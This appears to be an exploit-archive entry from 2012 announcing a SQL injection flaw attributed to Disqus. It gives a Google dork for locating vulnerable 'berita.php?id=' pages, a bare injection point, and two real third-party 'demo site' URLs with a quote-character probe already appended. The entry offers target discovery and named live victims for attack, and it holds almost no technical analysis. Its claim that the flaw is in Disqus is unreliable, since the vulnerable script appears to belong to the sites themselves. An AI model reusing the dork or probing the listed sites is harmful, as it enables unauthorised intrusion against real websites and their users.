id: 19377
date: 09/10/2012
title: Disqus SQL Injection Vulnerability
author: The Black Devils
cves: 

# Exploit Title: Disqus sql injection Vulnerability
# Date: 08/09/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Software Link: http://disqus.com/
# Category : [ webapps ]
# Google dork: intext:powered by disqus inurl:berita.php?id=
# Tested on: [Windows] & [Ubuntu]

-------------------------------

http:\Localhost\berita.php?id= [sql Injection]
-------------------------------
# Demo site:

http://obengware.com/news/index.php?id=%274397
http://www.riaupos.co/berita.php?act=full&id=%2716343

-------------------------------


#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------



#  0day.today [2023-03-26]  #